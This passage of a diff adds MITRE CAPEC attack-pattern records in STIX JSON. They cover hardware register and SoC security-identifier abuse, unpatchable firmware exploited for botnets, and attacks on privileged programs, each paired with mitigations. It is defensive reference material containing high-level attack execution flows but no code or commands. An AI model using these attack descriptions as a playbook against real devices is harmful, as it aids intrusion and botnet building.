"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--08999418-b2b2-438c-aa9b-95bf0933923b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--211fb4c0-38c1-4bfe-bb8e-b32e9baaf81c", + "target_ref": "attack-pattern--2b8d7aaf-bd4b-424f-8df4-6d0f37b72f4b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary exploits missing or incorrectly configured access control within registers to read/write data that is not meant to be obtained or modified by a user.\n ", + "external_references": [ + { + "external_id": "CAPEC-680", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/680.html" + }, + { + "external_id": "CWE-1224", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1224.html" + }, + { + "external_id": "CWE-1231", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1231.html" + }, + { + "external_id": "CWE-1233", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1233.html" + }, + { + "external_id": "CWE-1262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1262.html" + }, + { + "external_id": "CWE-1283", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1283.html" + }, + { + "description": "Brandon Hill, Huge Intel CPU Bug Allegedly Causes Kernel Memory Vulnerability With Up To 30% Performance Hit In Windows And Linux, 2018--01---02, David Altavilla and Hot Hardware, Inc", + "external_id": "REF-693", + "source_name": "reference_from_CAPEC", + "url": "https://hothardware.com/news/intel-cpu-bug-kernel-memory-isolation-linux-windows-macos" + } + ], + "id": "attack-pattern--1abd165a-57e9-4b78-9221-7b6fcdc57810", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Exploitation of Improperly Controlled Registers", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--92cdcd3d-d734-4442-afc3-4599f261498b", + "attack-pattern--aac17300-6cdd-4f50-82c3-da5a01d225ac" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Hardware", + "Hardware" + ], + "x_capec_example_instances": [ + "\n During a System-on-Chip's (SoC) secure boot process, the code to be authenticated is measured to determine the code's validity. This entails the one-way hash of the code binary being calculated and extended to the previous hash. The value obtained after completion of the boot flow is then stored in a register with the intent of later verifying this value to determine if the boot flow has been tampered with. However, the register being used does not prevent an adversary from modifying the register's contents, which can result in the adversary spoofing the measurement data used in the attestation process.\n " + ], + "x_capec_extended_description": "\n Hardware systems often utilize trusted lock bits to prevent a set of registers from being written to or to restrict a register to only being written to once. Registers are also frequently used to store sensitive data leveraged in additional security operations, such as secure booting, authenticating code, device attestation, and more. However, the access control mechanisms meant to protect these registers may be fully missing or ineffective due to misconfiguration. If an adversary is able to discover improper access controls surrounding registers, it could result in the adversary obtaining sensitive data and/or modifying data that is meant to be immutable. This can ultimately result in processes like secure boot being circumvented or in protected configurations being modified.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Awareness of the hardware being leveraged.", + "Access to the hardware being leveraged." + ], + "x_capec_skills_required": { + "High": "Intricate knowledge of registers." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design proper access control policies for hardware register access from software and ensure these policies are implemented in accordance with the specified design.", + "id": "course-of-action--963ffcae-bcd8-4754-a147-b844f6e13273", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-680-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--32aef2ed-6339-425f-9acf-8117ffb0c421", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--963ffcae-bcd8-4754-a147-b844f6e13273", + "target_ref": "attack-pattern--1abd165a-57e9-4b78-9221-7b6fcdc57810", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure security lock bit protections are reviewed for design inconsistencies and common weaknesses.", + "id": "course-of-action--6b798e4e-c828-4581-abb6-6e17c7dd80c8", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-680-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3e7a22ee-e503-4bb5-842d-dccfa1314700", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6b798e4e-c828-4581-abb6-6e17c7dd80c8", + "target_ref": "attack-pattern--1abd165a-57e9-4b78-9221-7b6fcdc57810", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Test security lock programming flow in both pre-silicon and post-silicon environments.", + "id": "course-of-action--46b5084e-a2c7-462c-8aac-2a3e6e32e12c", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-680-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3ce0cc33-be72-46dc-91f1-c7e2891fb760", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--46b5084e-a2c7-462c-8aac-2a3e6e32e12c", + "target_ref": "attack-pattern--1abd165a-57e9-4b78-9221-7b6fcdc57810", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage automated tools to test that values are not reprogrammable and that write-once fields lock on writing zeros.", + "id": "course-of-action--b579fa05-4d4e-46a5-8146-7c81316da234", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-680-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--739ffd20-3728-428b-b493-fba7c95d706c", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b579fa05-4d4e-46a5-8146-7c81316da234", + "target_ref": "attack-pattern--1abd165a-57e9-4b78-9221-7b6fcdc57810", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that measurement data is stored in registers that are read-only or otherwise have access controls that prevent modification by an untrusted agent.", + "id": "course-of-action--ba08dc27-44eb-4fa4-b5f2-dfbfa85987e5", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-680-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5af32ae4-547c-4e74-97a3-7ac9778fccd7", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ba08dc27-44eb-4fa4-b5f2-dfbfa85987e5", + "target_ref": "attack-pattern--1abd165a-57e9-4b78-9221-7b6fcdc57810", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary takes advantage of missing or incorrectly configured security identifiers (e.g., tokens), which are used for access control within a System-on-Chip (SoC), to read/write data or execute a given action.\n ", + "external_references": [ + { + "external_id": "CAPEC-681", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/681.html" + }, + { + "external_id": "CWE-1259", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1259.html" + }, + { + "external_id": "CWE-1267", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1267.html" + }, + { + "external_id": "CWE-1270", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1270.html" + }, + { + "external_id": "CWE-1294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1294.html" + }, + { + "external_id": "CWE-1302", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1302.html" + }, + { + "description": "PCIe Device Measurement Requirements, 2018--09, Intel Corporation", + "external_id": "REF-694", + "source_name": "reference_from_CAPEC", + "url": "https://www.intel.com/content/dam/www/public/us/en/documents/reference-guides/pcie-device-security-enhancements.pdf" + }, + { + "description": "John Butterworth, Cory Kallenberg, Xeno Kovah, BIOS Chronomancy: Fixing the Core Root of Trust for Measurement, 2013--07---31", + "external_id": "REF-695", + "source_name": "reference_from_CAPEC", + "url": "https://media.blackhat.com/us-13/US-13-Butterworth-BIOS-Security-Slides.pdf" + } + ], + "id": "attack-pattern--e8a8a8f5-3ad5-4d3f-a35b-48036147266b", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Exploitation of Improperly Controlled Hardware Security Identifiers", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--92cdcd3d-d734-4442-afc3-4599f261498b", + "attack-pattern--aac17300-6cdd-4f50-82c3-da5a01d225ac" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Hardware", + "Hardware" + ], + "x_capec_example_instances": [ + "\n A system contains a register (divided into four 32-bit registers) that is used to store a 128-bit AES key for encryption/decryption, in addition to an access-policy register. The access-policy register determines which agents may access the AES-key registers, based on a corresponding security identifier. It is assumed the system has two agents: a Main-controller and an Aux-controller, with respective security identifiers \"1\" and \"2\". The Main-controller (ID \"1\") is meant to have access to the AES-key registers, while the Aux-controller (ID \"2\") has access to the access-policy register. If a SoC incorrectly generates security identifier \"1\" for both agents, then both agents will have access to the AES-key registers. This could further result in a Denial-of-Service (DoS) or the execution of an action that in turn could result in privilege escalation or unintended access.\n " + ], + "x_capec_extended_description": "\n A System-on-Chip (SoC) often implements a security identifier mechanism to differentiate what actions are allowed or disallowed when a transaction originates from an entity. However, these mechanisms may be exploitable due to any number of the following:\n \n The security identifiers are missing\n The security identifiers are incorrectly implemented or generated\n The security identifiers are generated with an obsolete encoding\n The security identifiers are generated and implemented correctly, but are improperly protected\n \n If the security identifiers leveraged by the SoC are missing or misconfigured, an adversary may be able to take advantage of this shortcoming to circumvent the intended access controls. This could result in the adversary gaining unintended access, performing a Denial of Service (DoS), escalating privileges, or spoofing actions from a trusted agent.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Awareness of the hardware being leveraged.", + "Access to the hardware being leveraged." + ], + "x_capec_skills_required": { + "High": "Intricate knowledge of the identifiers being utilized.", + "Medium": "Ability to execute actions within the SoC." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Review generation of security identifiers for design inconsistencies and common weaknesses.", + "id": "course-of-action--01ab67eb-d3f3-4853-bda1-c1ca06afc898", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-681-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d0df491b-0667-4d31-9aa1-9a9f21ccbc1c", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--01ab67eb-d3f3-4853-bda1-c1ca06afc898", + "target_ref": "attack-pattern--e8a8a8f5-3ad5-4d3f-a35b-48036147266b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Review security identifier decoders for design inconsistencies and common weaknesses.", + "id": "course-of-action--2290178c-f33c-4fb0-9b25-c553c2499dae", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-681-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--38e2a6ae-74e9-48d2-8118-bf5c8494a56c", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2290178c-f33c-4fb0-9b25-c553c2499dae", + "target_ref": "attack-pattern--e8a8a8f5-3ad5-4d3f-a35b-48036147266b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Test security identifier definition, access, and programming flow in both pre-silicon and post-silicon environments.", + "id": "course-of-action--cb529162-8335-438c-9301-27477c72f990", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-681-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c1cc36ea-b168-4d92-b480-8c003969dc5a", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--cb529162-8335-438c-9301-27477c72f990", + "target_ref": "attack-pattern--e8a8a8f5-3ad5-4d3f-a35b-48036147266b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may exploit vulnerable code (i.e., firmware or ROM) that is unpatchable. Unpatchable devices exist due to manufacturers intentionally or inadvertently designing devices incapable of updating their software. Additionally, with updatable devices, the manufacturer may decide not to support the device and stop making updates to their software.", + "external_references": [ + { + "external_id": "CAPEC-682", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/682.html" + }, + { + "external_id": "CWE-1277", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1277.html" + }, + { + "external_id": "CWE-1310", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1310.html" + }, + { + "description": "Alex Scroxton, Alarm bells ring, the IoT is listening, 2019--12---13, TechTarget", + "external_id": "REF-723", + "source_name": "reference_from_CAPEC", + "url": "https://www.computerweekly.com/news/252475324/Alarm-bells-ring-the-IoT-is-listening" + }, + { + "description": "Matthew Hughes, Bad news: KeyWe Smart Lock is easily bypassed and can't be fixed, 2019--12---11, Situation Publishing", + "external_id": "REF-724", + "source_name": "reference_from_CAPEC", + "url": "https://www.theregister.com/2019/12/11/f_secure_keywe/" + }, + { + "description": "Brian Krebs, Zyxel Flaw Powers New Mirai IoT Botnet Strain, 2020--03---20, Krebs on Security", + "external_id": "REF-725", + "source_name": "reference_from_CAPEC", + "url": "https://krebsonsecurity.com/2020/03/zxyel-flaw-powers-new-mirai-iot-botnet-strain/" + }, + { + "description": "Colin Schulz, Stefan Raff, Sebastian Kortmann, Nikolaus Obwegeser, Digital Age Organizations: Uncovering Over-the-Air Updates in the Smart Product Realm, 2021--12, International Conference on Information Systems (ICIS) 2021", + "external_id": "REF-726", + "source_name": "reference_from_CAPEC", + "url": "https://www.researchgate.net/publication/356065917_Digital_Age_Organizations_Uncovering_Over-the-Air_Updates_in_the_Smart_Product_Realm" + } + ], + "id": "attack-pattern--01a08342-5c58-4f61-b8e1-997e444b3a59", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Exploitation of Firmware or ROM Code with Unpatchable Vulnerabilities", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n An IoT company comes out with a line of smart products for home use such as home cameras, vacuums, and smart bulbs. The products become popular, and millions of consumers install these devices in their homes. All the devices use a custom module for encryption that is stored on a ROM chip, which is immutable memory and can't be changed. An adversary discovers that there is a vulnerability in the encryption module code that allows authentication bypass, gaining access to any device. The adversary then develops botnet code that is remotely downloaded onto the infected devices. This code scans the internet for nearby devices from the same product line and exploits the vulnerability, loading the botnet code onto these new devices. Over time, the adversary now has a botnet of devices that can carry out malicious activity such as a DDoS attacks. Once the vulnerability is found, it is impossible to remediate because the vulnerable code is unable to be updated.\n ", + "\n Older smartphones can become out of date and manufacturers may stop putting out security updates as they focus on newer models. If an adversary discovers a vulnerability in an old smartphone there is a chance that a security update will not be made to mitigate it. This leaves anyone using the old smartphone vulnerable.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine vulnerable firmware or ROM code: An adversary will attempt to find device models that are known to have unpatchable firmware or ROM code, or are deemed “end-of-support” where a patch will not be made. The adversary looks for vulnerabilities in firmware or ROM code for the identified devices, or looks for devices which have known vulnerabilities

    2. Techniques
    Many botnets use wireless scanning to discover nearby devices that might have default credentials or commonly used passwords. Once these devices are infected, they can search for other nearby devices and so on.

Experiment

  1. Determine plan of attack: An adversary identifies a specific device/model that they wish to attack. They will also investigate similar devices to determine if the vulnerable firmware or ROM code is also present.

Exploit

  1. Carry out attack: An adversary exploits the vulnerable firmware or ROM code on the identified device(s) to achieve their desired goal.

    2. Techniques
    Install malware on a device to recruit it for a botnet.
    Install malware on the device and use it for a ransomware attack.
    Gain root access and steal information stored on the device.
    Manipulate the device to behave in unexpected ways which would benefit the adversary.
", + "x_capec_extended_description": "When a vulnerability is found in a device that has no means of patching, the attack may be used against an entire class of devices. Devices from the same manufacturer often use similar or identical firmware, which could lead to widespread attacks. Devices of this nature are prime targets for botnet attacks. Consumer devices are frequently targeted for this attack due to the complexities of updating firmware once manufacturers no longer have physical access to a device. When exploiting a found vulnerability, adversaries often try to gain root access on a device. This allows them to use the device for any malicious purpose. Some example exploits are stealing device data, using the device for a ransomware attack, or recruiting the device for a botnet.", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Awareness of the hardware being leveraged.", + "Access to the hardware being leveraged, either physically or remotely." + ], + "x_capec_skills_required": { + "High": "Ability to identify physical entry points such as debug interfaces if the device is not being accessed remotely", + "Medium": "Knowledge of various wireless protocols to enable remote access to vulnerable devices" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design systems and products with the ability to patch firmware or ROM code after deployment to fix vulnerabilities.", + "id": "course-of-action--50d2cb62-2305-4a24-b41a-b873229ef2b9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-682-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--674abd8b-cd24-4a54-a5d6-ec62714bbb25", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--50d2cb62-2305-4a24-b41a-b873229ef2b9", + "target_ref": "attack-pattern--01a08342-5c58-4f61-b8e1-997e444b3a59", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make use of OTA (Over-the-air) updates so that firmware can be patched remotely either through manual or automatic means", + "id": "course-of-action--feb21138-cc49-427c-a020-0515522bd9d7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-682-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9984f250-94f7-4b92-83be-65978b06954e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--feb21138-cc49-427c-a020-0515522bd9d7", + "target_ref": "attack-pattern--01a08342-5c58-4f61-b8e1-997e444b3a59", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets programs running with elevated privileges. The adversary tries to leverage a vulnerability in the running program and get arbitrary code to execute with elevated privileges.", + "external_references": [ + { + "external_id": "CAPEC-69", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/69.html" + }, + { + "external_id": "CWE-250", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/250.html" + }, + { + "external_id": "CWE-15", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/15.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Target Programs with Elevated Privileges", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--e62000f0-addd-4156-b9fd-469bbb211d45", + "attack-pattern--b6a2983b-1d97-4698-b210-961ed0523f33", + "attack-pattern--4a29d66d-8617-4382-b456-578ecdb1609e", + "attack-pattern--4cd18074-15c1-4206-8391-115685669623" + ], + "x_capec_child_of_refs": [ + "attack-pattern--c05fff04-b965-4a11-9c18-379dac31969f" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Resource Consumption (Denial of Service)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find programs with elevated priveleges: The adversary probes for programs running with elevated privileges.

    2. Techniques
    Look for programs that write to the system directories or registry keys (such as HKLM, which stores a number of critical Windows environment variables). These programs are typically running with elevated privileges and have usually not been designed with security in mind. Such programs are excellent exploit targets because they yield lots of power when they break.

  2. Find vulnerability in running program: The adversary looks for a vulnerability in the running program that would allow for arbitrary code execution with the privilege of the running program.

    3. Techniques
    Look for improper input validation
    Look for improper failure safety. For instance when a program fails it may authorize restricted access to anyone.
    Look for a buffer overflow which may be exploited if an adversary can inject unvalidated data.

Exploit

  1. Execute arbitrary code: The adversary exploits the vulnerability that they have found. For instance, they can try to inject and execute arbitrary code or write to OS resources.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The targeted program runs with elevated OS privileges.", + "The targeted program accepts input data from the user or from another program.", + "The targeted program is giving away information about itself. Before performing such attack, an eventual attacker may need to gather information about the services running on the host target. The more the host target is verbose about the services that are running (version number of application, etc.) the more information can be gather by an attacker.", + "This attack often requires communicating with the host target services directly. For instance Telnet may be enough to communicate with the host target." + ], + "x_capec_skills_required": { + "Low": "An attacker can use a tool to scan and automatically launch an attack against known issues. A tool can also repeat a sequence of instructions and try to brute force the service on the host target, an example of that would be the flooding technique.", + "Medium": "More advanced attack may require knowledge of the protocol spoken by the host service." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Apply the principle of least privilege.", + "id": "course-of-action--c87108ec-86d6-4db1-b9a6-9d165534dfbb", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4ac5e039-5b39-4762-baa6-db1436c0c113", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c87108ec-86d6-4db1-b9a6-9d165534dfbb", + "target_ref": "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Validate all untrusted data.", + "id": "course-of-action--ffbb9cca-91d0-42f4-8214-bd2ef9539388", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3b71f57d-057f-4ba8-90a3-b82441f7ad5f", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ffbb9cca-91d0-42f4-8214-bd2ef9539388", + "target_ref": "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 